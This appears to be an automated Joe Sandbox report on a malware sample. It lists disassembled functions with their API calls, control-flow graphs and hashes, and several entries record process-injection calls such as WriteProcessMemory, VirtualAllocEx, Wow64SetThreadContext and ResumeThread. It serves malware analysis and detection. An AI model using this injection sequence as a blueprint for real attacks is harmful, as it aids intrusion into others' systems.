                                                                                                                                                • Opcode ID: 72588114a5f8483965fadf37eb860e0aa4302f2d90c331136473002e3a694d61
                                                                                                                                                • Instruction ID: 907ec3c6f0ec0e91ac01c156ec6d5025afe43a2b27b09acfaa6c565fec108582
                                                                                                                                                • Opcode Fuzzy Hash: 72588114a5f8483965fadf37eb860e0aa4302f2d90c331136473002e3a694d61
                                                                                                                                                • Instruction Fuzzy Hash: 01814670A00B058FD724DF29D44575ABBF1FF48304F14892EE48AD7A90D775E849CBA1
                                                                                                                                                Function 00D0590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 798 d0590c-d0590e 799 d05910 798->799 800 d05912 798->800 799->800 801 d05914 800->801 802 d05916 800->802 801->802 803 d05918-d059d9 CreateActCtxA 802->803 805 d059e2-d05a3c 803->805 806 d059db-d059e1 803->806 813 d05a4b-d05a4f 805->813 814 d05a3e-d05a41 805->814 806->805 815 d05a60 813->815 816 d05a51-d05a5d 813->816 814->813 818 d05a61 815->818 816->815 818->818
                                                                                                                                                APIs
                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00D059C9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: a5f93928980782070f7866b287fc79ee6d85bdb9ac23c5b5477a1523816842a4
                                                                                                                                                • Instruction ID: 3b717cef957f5fe8e191803ca72131d6f40e9572f1ee64b2c96de07e033ecea3
                                                                                                                                                • Opcode Fuzzy Hash: a5f93928980782070f7866b287fc79ee6d85bdb9ac23c5b5477a1523816842a4
                                                                                                                                                • Instruction Fuzzy Hash: ED4125B0C00719CFDB24CFAAD88479EBBF5BF48314F24805AD408AB255DB756945CFA0
                                                                                                                                                Function 00D044B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 819 d044b0-d059d9 CreateActCtxA 822 d059e2-d05a3c 819->822 823 d059db-d059e1 819->823 830 d05a4b-d05a4f 822->830 831 d05a3e-d05a41 822->831 823->822 832 d05a60 830->832 833 d05a51-d05a5d 830->833 831->830 835 d05a61 832->835 833->832 835->835
                                                                                                                                                APIs
                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00D059C9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                • Opcode ID: 1aa009014d2c907bf7c3978b16d92123957555c4422cb72b14d61f718c76d053
                                                                                                                                                • Instruction ID: 399f777e8d4bf967b6b0fad01b44f38ececa7769c61cecf7b276dbabf48e28fd
                                                                                                                                                • Opcode Fuzzy Hash: 1aa009014d2c907bf7c3978b16d92123957555c4422cb72b14d61f718c76d053
                                                                                                                                                • Instruction Fuzzy Hash: A941F2B0D00619DFDB24CFAAD884B8EBBB5BF48304F24806AD408AB255DB756945CFA0
                                                                                                                                                Function 06C43F90 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 836 6c43f90-6c43fe4 838 6c43fe6-6c43fec 836->838 839 6c43fef-6c43ffe 836->839 838->839 840 6c44000 839->840 841 6c44003-6c4403c DrawTextExW 839->841 840->841 842 6c44045-6c44062 841->842 843 6c4403e-6c44044 841->843 843->842
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06C4402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: 1a0346130a15d61e2fc20f5d6ebd634a47926caf5767c69a673cb2ea8de742dc
                                                                                                                                                • Instruction ID: 9d116bb204756ed2c1094e69a914409fcef58fb45ec872e12702f1d4e244f572
                                                                                                                                                • Opcode Fuzzy Hash: 1a0346130a15d61e2fc20f5d6ebd634a47926caf5767c69a673cb2ea8de742dc
                                                                                                                                                • Instruction Fuzzy Hash: 553100B5D012499FCB10DF9AD884ADEFBF4FB48320F24842AE818A7310D374A940CFA0
                                                                                                                                                Function 06DD7199 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 846 6dd7199-6dd71ee 849 6dd71fe-6dd723d WriteProcessMemory 846->849 850 6dd71f0-6dd71fc 846->850 852 6dd723f-6dd7245 849->852 853 6dd7246-6dd7276 849->853 850->849 852->853
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 20ab314b90c79ca8b22d78b4a19e2b04da1b4441db07494bb72bf72253157ca7
                                                                                                                                                • Instruction ID: 4d6b41c94a787816286feb4821c7f9a9a8cbf6bbb027bc3982b1c168bab5f60c
                                                                                                                                                • Opcode Fuzzy Hash: 20ab314b90c79ca8b22d78b4a19e2b04da1b4441db07494bb72bf72253157ca7
                                                                                                                                                • Instruction Fuzzy Hash: 752117B1900359DFCB10DFAAC985BDEBBF5FF48314F10842AE998A7251C774A944CBA4
                                                                                                                                                Function 06C47BB1 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 857 6c47bb1-6c47c0c 861 6c47c72-6c47c8d 857->861 862 6c47c0e-6c47c50 MonitorFromPoint 857->862 870 6c47c8f-6c47c9c 861->870 865 6c47c52-6c47c58 862->865 866 6c47c59-6c47c67 call 6c47d79 862->866 865->866 869 6c47c6d-6c47c70 866->869 869->870
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 06C47C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 8babbee786cb9640f3989a218f3297a28a7fe20df0d63ff8d5bef0c0a8d7e94b
                                                                                                                                                • Instruction ID: 33fe80eba1102d851f15f6fd22a01ca6d3a6971b9083b82f2920cbd493c33f45
                                                                                                                                                • Opcode Fuzzy Hash: 8babbee786cb9640f3989a218f3297a28a7fe20df0d63ff8d5bef0c0a8d7e94b
                                                                                                                                                • Instruction Fuzzy Hash: 232146B1D002589FCB11EF99D844BEEBFB4EB09321F14849AE895AB341C7346A44CFA0
                                                                                                                                                Function 06DD71A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DD7230
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 72fbe2b3980980c70040495aff9e43d49318f92cb864f1ee9c887e5e41291377
                                                                                                                                                • Instruction ID: 1f4d8910a07f76ce73870d85de99e2de74a70164fe7788248f58e8888b77c612
                                                                                                                                                • Opcode Fuzzy Hash: 72fbe2b3980980c70040495aff9e43d49318f92cb864f1ee9c887e5e41291377
                                                                                                                                                • Instruction Fuzzy Hash: 002126B19003599FCB10DFAAC885BDEBBF5FF48314F10842AE958A7250C778A944CBA4
                                                                                                                                                Function 06C43F98 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06C4402F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DrawText
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175133113-0
                                                                                                                                                • Opcode ID: 3f0e2f7cf8e44308075e87ec36d5327445513d296c05372314a86fbf7ab773c4
                                                                                                                                                • Instruction ID: 945988bc409042591085fcbc72ab5d6cdeb6937ff584db77c316c4c077010f2e
                                                                                                                                                • Opcode Fuzzy Hash: 3f0e2f7cf8e44308075e87ec36d5327445513d296c05372314a86fbf7ab773c4
                                                                                                                                                • Instruction Fuzzy Hash: 8321CEB5D002499FDB10DF9AD884A9EFBF5FB58320F24842AE919A7210D775A944CFA0
                                                                                                                                                Function 06DD7288 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 791a49643544d7268ef04757927bd741bb04b41f477db90e7a97709327344508
                                                                                                                                                • Instruction ID: d58cf951722d8fe8891d8849afad6bc027d6b63fda3b044efc7c8be6b0201c93
                                                                                                                                                • Opcode Fuzzy Hash: 791a49643544d7268ef04757927bd741bb04b41f477db90e7a97709327344508
                                                                                                                                                • Instruction Fuzzy Hash: 4A2127B19003499FCB10DFAAD881ADEFBF5FF48320F508429E998A7250C7349550DBA5
                                                                                                                                                Function 06DD7001 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 6e4207808172d85b30382b371cf59e39267070a2b27a38a23663b080eca37954
                                                                                                                                                • Instruction ID: 92f062898dca015a9c11b9824d267cb32394841404f56967c064eccc9bf10264
                                                                                                                                                • Opcode Fuzzy Hash: 6e4207808172d85b30382b371cf59e39267070a2b27a38a23663b080eca37954
                                                                                                                                                • Instruction Fuzzy Hash: 3A2139B1D002098FCB10DFAAC4857EEBBF4AF48324F148429D458A7281C778A945CBA4
                                                                                                                                                Function 06C47BC0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 06C47C3F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2043939919.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6c40000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromMonitorPoint
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1566494148-0
                                                                                                                                                • Opcode ID: 3c9ed0ca83358d7e9b81de55a769a6da24e043cb97c1e66d8b3b94a311910eb0
                                                                                                                                                • Instruction ID: 319efaae40243c232f8bca89a181824e50b8f27212553255fe9280565057be43
                                                                                                                                                • Opcode Fuzzy Hash: 3c9ed0ca83358d7e9b81de55a769a6da24e043cb97c1e66d8b3b94a311910eb0
                                                                                                                                                • Instruction Fuzzy Hash: 15215AB1E002088FCB10EF9AD405BEEFBF5EB45321F14805AE955A7380C7356944CFA0
                                                                                                                                                Function 06DD7290 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DD7310
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                • Opcode ID: 70b26ba237f10d77cf50edc42209dfaf0d91fa409ee26a823684f4376628e21e
                                                                                                                                                • Instruction ID: f6b2921e6b90c7279425aa9363144bd2958da3cfbfde3781dae5b0daba801f8e
                                                                                                                                                • Opcode Fuzzy Hash: 70b26ba237f10d77cf50edc42209dfaf0d91fa409ee26a823684f4376628e21e
                                                                                                                                                • Instruction Fuzzy Hash: 972128B1D002599FCB10DFAAC880ADEFBF5FF48320F50842AE958A7250C7349944DBA4
                                                                                                                                                Function 06DD7008 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DD7086
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                • Opcode ID: 592dfe1a6f622aa497ce56c6e3c8ff19e9cacec580f17aa944fbfd145d156b8c
                                                                                                                                                • Instruction ID: f02cb839465f3a8385eed72387ca4d991feff66a4acbf08c7142399d95f3551c
                                                                                                                                                • Opcode Fuzzy Hash: 592dfe1a6f622aa497ce56c6e3c8ff19e9cacec580f17aa944fbfd145d156b8c
                                                                                                                                                • Instruction Fuzzy Hash: B72137B1D002098FDB10DFAAC4857EEBBF4AB48364F14842AD459A7240C779A944CFA4
                                                                                                                                                Function 00D0D710 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: 060e7672c800eaaa55f97ea57aa326f080e98d830d3d957e1d5fb537f5ef7968
                                                                                                                                                • Instruction ID: 10d8e8e8c4a9723f14e0973c23a1eda4cb23a39940be2e09bd0df3ec315a2482
                                                                                                                                                • Opcode Fuzzy Hash: 060e7672c800eaaa55f97ea57aa326f080e98d830d3d957e1d5fb537f5ef7968
                                                                                                                                                • Instruction Fuzzy Hash: BA21C2B5900258DFDB10CFAAD984ADEFFF9EB48320F14841AE958A7350D374A944CFA5
                                                                                                                                                Function 00D0D709 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D0D797
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                • Opcode ID: c7763c7bc05a6bd63a6c4e7e3ae754744771fcd48e7e554f80828f2b6285b752
                                                                                                                                                • Instruction ID: 13fd2458443187792dadfeaddd94208d9ab96687f2ef04d6c576320bff02446d
                                                                                                                                                • Opcode Fuzzy Hash: c7763c7bc05a6bd63a6c4e7e3ae754744771fcd48e7e554f80828f2b6285b752
                                                                                                                                                • Instruction Fuzzy Hash: 3021E0B5900218DFDB10CFAAD584ADEBBF5EB48324F14841AE958A7360C374A944CF60
                                                                                                                                                Function 06DD70D9 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: f3e754d994f2df767fc5614d3e2b83983c45c33f1b869c88abe145b2e707907f
                                                                                                                                                • Instruction ID: 5d402c4c8b63d0dd919f83e9835d6140a1930abc7c781281f7b8fa8b5bfa2f2a
                                                                                                                                                • Opcode Fuzzy Hash: f3e754d994f2df767fc5614d3e2b83983c45c33f1b869c88abe145b2e707907f
                                                                                                                                                • Instruction Fuzzy Hash: D21147B59002499FCB10DFAAC845BDFBFF5EF48324F208419E959A7250CB75A940CFA5
                                                                                                                                                Function 06DD6F51 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: 03e5296b97652b0ceaed0b33dd7746d9a583a27710c19c52ec5baeef8ccd514b
                                                                                                                                                • Instruction ID: 5f9b83c19ff67fddc43731cef45d350cd7fe7d6c9704aca70e5086dcfdcbb1b1
                                                                                                                                                • Opcode Fuzzy Hash: 03e5296b97652b0ceaed0b33dd7746d9a583a27710c19c52ec5baeef8ccd514b
                                                                                                                                                • Instruction Fuzzy Hash: 081149B19002488FCB20DFAAC4457DEFBF4EF88324F208829D459A7250CB35A544CF94
                                                                                                                                                Function 06DD70E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DD714E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 001f7f0757e50d73d0e12b4429dd3cfaf6a0110712ac3e6db92ae00b56502bf0
                                                                                                                                                • Instruction ID: 2a28f1bee313dc1ef5b9bd3eee6216daf1078461d509e04304e88673a638c286
                                                                                                                                                • Opcode Fuzzy Hash: 001f7f0757e50d73d0e12b4429dd3cfaf6a0110712ac3e6db92ae00b56502bf0
                                                                                                                                                • Instruction Fuzzy Hash: 371126B19002499FCB10DFAAC844BDEBFF5EB88324F148419E559A7250C775A944CFA4
                                                                                                                                                Function 06DDAEB8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DDAF1D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                • Opcode ID: 4b5a27521dcbb74563d1638edd0d27a9d4355355573888dc418712fe46ec536e
                                                                                                                                                • Instruction ID: 25762997768527faca7748e137864da21c6dfc394885fb461a53adf5e0422149
                                                                                                                                                • Opcode Fuzzy Hash: 4b5a27521dcbb74563d1638edd0d27a9d4355355573888dc418712fe46ec536e
                                                                                                                                                • Instruction Fuzzy Hash: 1011F5B5800349DFCB10DF9AD485BDEFBF8EB48324F14885AE994A7210C375A544CFA5
                                                                                                                                                Function 06DD6F58 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                • Opcode ID: ba5d2546bb596789d844d3db80172deb0ad39677f7894d06c77eccfd41295e4f
                                                                                                                                                • Instruction ID: 4e8d4e11e5187102673875836223218d97cc470c8716ebcbe76df4150243f05b
                                                                                                                                                • Opcode Fuzzy Hash: ba5d2546bb596789d844d3db80172deb0ad39677f7894d06c77eccfd41295e4f
                                                                                                                                                • Instruction Fuzzy Hash: A31136B1D002488FCB20DFAAC8457DEFBF5EB88324F24842AD559A7250CB75A944CFA4
                                                                                                                                                Function 06DD5470 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06DDAF1D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2044092555.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_6dd0000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePost
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                • Opcode ID: b60f2d7b8d163e438ec1539d893188268117953c6f787a0b1be93964899c2913
                                                                                                                                                • Instruction ID: 0b7ec59ee7fa1e66410a5c8cfe887b4c51573a89c88c6c4c805998be938b30f6
                                                                                                                                                • Opcode Fuzzy Hash: b60f2d7b8d163e438ec1539d893188268117953c6f787a0b1be93964899c2913
                                                                                                                                                • Instruction Fuzzy Hash: 361103B5900348DFDB50DF9AD884BDEFBF8EB48320F14845AE958A7210C375A944CFA5
                                                                                                                                                Function 00D0B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00D0B07E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036586408.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_d00000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                • Opcode ID: 60c2940d78a05dc0d1b03f93af6dcb581585834c27ad374e4996a7c881b6b6fa
                                                                                                                                                • Instruction ID: 917f82b3f407fe927589c4ffa01be5843a12a09d93a003d06435c8649817bcb3
                                                                                                                                                • Opcode Fuzzy Hash: 60c2940d78a05dc0d1b03f93af6dcb581585834c27ad374e4996a7c881b6b6fa
                                                                                                                                                • Instruction Fuzzy Hash: 951110B5C003498FCB20CF9AD444BDEFBF4EB88324F14842AD468A7250D379A545CFA1
                                                                                                                                                Function 00B5D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000A.00000002.2036188864.0000000000B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B5D000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_10_2_b5d000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6bc111b1a1e41b1bbdcc713c3d2f13b5a936720d176b63275a28408567a611cc
                                                                                                                                                • Instruction ID: 84d23c6fb8c274ecde15cb1cf46a1cd3330df293ffccd9360b43e828099545e7
                                                                                                                                                • Opcode Fuzzy Hash: 6bc111b1a1e41b1bbdcc713c3d2f13b5a936720d176b63275a28408567a611cc
                                                                                                                                                • Instruction Fuzzy Hash: 80212871500204DFDB15DF14D9C0B26BFA5FB94315F20C6E9DD094B356C336E85ACAA2
                                                                                                                                                Function 00B6D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
